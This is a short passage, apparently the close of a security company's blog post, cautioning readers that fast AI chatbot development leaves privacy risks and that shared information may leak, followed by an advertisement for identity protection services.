We have said this before and we’ll probably have to repeat it numerous times, but the need for fast developments in this field is creating privacy risks that we have never seen before, simply because security is an afterthought for the developers. So, no matter which AI chatbot you prefer, always be mindful of the information you feed it: It may find its way to unexpected and undesirable places.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.